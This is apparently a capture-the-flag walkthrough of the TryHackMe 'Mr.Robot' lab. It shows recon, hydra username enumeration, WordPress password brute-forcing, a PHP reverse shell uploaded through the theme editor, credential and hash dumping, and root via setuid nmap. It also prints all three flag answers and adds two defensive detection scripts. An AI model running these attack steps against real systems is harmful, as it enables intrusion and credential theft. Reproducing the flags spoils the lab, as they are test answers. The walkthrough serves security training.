Mr.Robot
Nmap
```console
Nmap scan report for 10.10.49.229
Host is up (0.17s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Read data files from: /usr/bin/../share/nmap
```
Recon
Port 80
Wordpress Website
```console
└─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.49.229/ -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.49.229/
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/10/05 13:15:22 Starting gobuster
===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
```
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ more wpscan.txt
_______________________________________________________________
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.49.229/ [10.10.49.229]
[+] Started: Tue Oct  5 13:26:11 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.49.229/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.49.229/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] The external WP-Cron seems to be enabled: http://10.10.49.229/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.49.229/2742d2a.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.49.229/2742d2a.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: http://10.10.49.229/wp-content/themes/twentyfifteen/
 | Latest Version: 3.0
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.49.229/wp-content/themes/twentyfifteen/readme.txt
 | Style URL: http://10.10.49.229/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs -: |=============================================================================================================================================================================================================================|
[i] No Users Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Oct  5 13:26:16 2021
[+] Requests Done: 12
[+] Cached Requests: 54
[+] Data Sent: 2.692 KB
[+] Data Received: 11.836 KB
[+] Memory used: 252.785 MB
[+] Elapsed time: 00:00:05
```
Robots.txt file
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ curl "http://10.10.49.229/robots.txt"
User-agent: *
fsocity.dic
key-1-of-3.txt
```
Key - 1
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ curl "http://10.10.49.229/key-1-of-3.txt"
073403c8a58a1f80d943455fb30724b9
```
Let's download the dictionary file; it may be used to brute-force the WordPress login.
Searching for a username with hydra: every entry of fsocity.dic is submitted to the lost-password form, and any response that does not contain "Invalid username" marks an existing account.
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ hydra -L fsocity.dic -p test 10.10.49.229 http-post-form "/wp-login.php?action=lostpassword:user_login=^USER^&wp-submit=Get+New+Password:Invalid username"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-05 13:57:53
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://10.10.49.229:80/wp-login.php?action=lostpassword:user_login=^USER^&wp-submit=Get+New+Password:Invalid username
[80][http-post-form] host: 10.10.49.229   login: Elliot   password: test
```
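From the defender's side the run above leaves a distinctive trace: one source address posting to /wp-login.php?action=lostpassword hundreds of times within seconds. As an added example (not part of this writeup), the Python below counts such POSTs per source IP over a sliding window in Apache combined-format access logs; the log lines are constructed, and the window and threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
LOSTPW = "/wp-login.php?action=lostpassword"   # the form hydra posts to above

def parse(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_enumerators(lines, window=timedelta(seconds=60), threshold=20):
    """Map source IP -> peak number of lost-password POSTs seen inside any
    sliding `window`; only IPs whose peak exceeds `threshold` are returned."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOSTPW:
            per_ip[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # drop stamps that fell out of the window
                start += 1
            count = end - start + 1
            if count > threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits

def sample_log():
    """Constructed sample: one client posting twice a second for 30 s, one ordinary visitor."""
    base = datetime(2021, 10, 5, 13, 57, 53)
    line = '{ip} - - [{ts}] "POST {path} HTTP/1.1" 200 4521 "-" "{ua}"'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
    lines = [line.format(ip="10.17.27.83", ts=stamp(i // 2), path=LOSTPW, ua="constructed-scanner")
             for i in range(60)]
    lines.append(line.format(ip="192.0.2.10", ts=stamp(0), path=LOSTPW, ua="Mozilla/5.0"))
    lines.append('192.0.2.10 - - [05/Oct/2021:13:58:00 +0000] "GET /blog HTTP/1.1" 301 0 "-" "Mozilla/5.0"')
    return lines
```

`find_enumerators(sample_log())` returns `{'10.17.27.83': 60}`: the single legitimate reset request from 192.0.2.10 stays below the threshold.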
Error text returned for a valid username with a wrong password: `ERROR: The password you entered for the`
Brute-forcing the password
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ wpscan --url http://10.10.49.229 -U Elliot -P fsocity.dic
```
After a long wait, the brute-force finishes with:
```console
user: Elliot
pass: ER28-0652
```
User
Logging into WordPress.
Uploading the reverse shell payload; in this case I am using the PentestMonkey PHP reverse shell, with `$ip` and `$port` set to my listener.
```php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.17.27.83';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
-----<TRIM>----
```
After saving the shell's contents in the editor, access the main page; the listener then receives a reverse shell.
```console
└─$ nc -lvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.49.229 54163
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 08:48:27 up  1:06,  0 users,  load average: 1.07, 1.41, 1.37
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@linux:/$
```
Upgrading the shell
While scrolling through the directories of the hosted Apache WordPress server, I found the WordPress config file with credentials:
```php
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');

/** MySQL database username */
define('DB_USER', 'bn_wordpress');

/** MySQL database password */
define('DB_PASSWORD', '570fd42948');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

<<TRIMMED>>

define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);
```
```console
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| mich05654  | $P$BpmKcWWjgC3/UGtj/fO36PsCxYC2E51 |
| elliot     | $P$BHh01ohuhaRcy2EAC6ad//vTQ1eMwe. |
+------------+------------------------------------+
2 rows in set (0.00 sec)
```
```console
daemon@linux:/home/robot$ pwd
pwd
/home/robot
daemon@linux:/home/robot$ ls -rlta
ls -rlta
total 16
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$
```
```console
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
```
Cracking the hash with hashcat
```console
┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ hashcat -m 0 hash.txt /opt/rockyou.txt
hashcat (v6.0.0) starting...

Host memory required for this attack: 66 MB

Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
```
```console
user : robot
pass : abcdefghijklmnopqrstuvwxyz
```
Logging in as robot
```console
daemon@linux:/home/robot$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ python -c 'import pty;pty.spawn("/bin/bash")'
robot@linux:~$
```
Key 2
```console
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
```
Root
Uploaded LinPEAS to the box and found an interesting SUID binary: /usr/local/bin/nmap is setuid root.
```console
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Feb 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 41K Feb 17 2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 32K Feb 17 2014 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 37K Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 10K Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 431K May 12 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 68K Feb 12 2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 93K Feb 12 2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 11K Feb 25 2015 /usr/lib/pt_chown  --->  GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 152K Mar 12 2015 /usr/bin/sudo  --->  /sudo$
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
-r-sr-xr-x 1 root root 9.4K Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
```
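A setuid-root nmap under /usr/local is the kind of entry a periodic SUID audit should catch before anyone runs LinPEAS. As an added example (not from the writeup or from LinPEAS), the Python below reads an `ls -l` style listing of the shape shown above and flags setuid-root files that sit on paths the package manager does not own or that are missing from a baseline; the baseline is the set of distro-owned entries in the listing above, and the sample listing is constructed.

```python
import re

# Fields as LinPEAS / `ls -l` print them: mode links owner group size month day year path [---> note]
LS_RE = re.compile(
    r'^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)'
)
# Setuid-root files from the listing above that belong to distro packages; anything else deserves a look.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/bin/su", "/bin/ping", "/bin/ping6", "/bin/mount",
    "/bin/umount", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/pt_chown", "/usr/lib/eject/dmcrypt-get-device",
}
# Paths the package manager does not own: a setuid-root file here was placed by hand.
UNMANAGED = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/dev/shm/", "/var/tmp/")

def audit_suid(lines, baseline=BASELINE):
    """Return [(path, reason)] for every setuid file in `lines` that is owned by
    root and either sits on an unmanaged path or is missing from `baseline`."""
    findings = []
    for line in lines:
        m = LS_RE.match(line.strip())
        if not m or m["mode"][3] not in "sS" or m["owner"] != "root":
            continue   # not a setuid-root file (or not a listing line at all)
        path = m["path"]
        if path.startswith(UNMANAGED):
            findings.append((path, "setuid root on unmanaged path"))
        elif path not in baseline:
            findings.append((path, "setuid root, not in baseline"))
    return findings

# Constructed sample in the shape of the LinPEAS listing above.
SAMPLE = """
-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)
-rwsr-xr-x 1 root root 37K Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 152K Mar 12 2015 /usr/bin/sudo  --->  /sudo$
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
-r-sr-xr-x 1 root root 9.4K Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwxr-xr-x 1 root root 12K Nov 13 2015 /usr/local/bin/helper
-rwsr-xr-x 1 robot robot 8.0K Nov 13 2015 /home/robot/tool
""".strip().splitlines()

if __name__ == "__main__":
    for path, reason in audit_suid(SAMPLE):
        print(f"{reason}: {path}")
```

On the sample this reports /usr/local/bin/nmap as setuid root on an unmanaged path and the VMware wrapper as outside the baseline; the non-setuid helper and the robot-owned file are ignored.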
https://gtfobins.github.io/gtfobins/nmap/#suid (the snippet below is the sudo variant and relies on NSE, which arrived in nmap 4.50; this box runs nmap 3.81, so the interactive mode used next is the one that applies here)
```sh
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
```
```console
robot@linux:/dev/shm$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# ls -rlta
ls -rlta
total 32
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwx------  2 root root 4096 Nov 13  2015 .cache
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
drwx------  3 root root 4096 Nov 13  2015 .
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
```
Key 3
```console
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```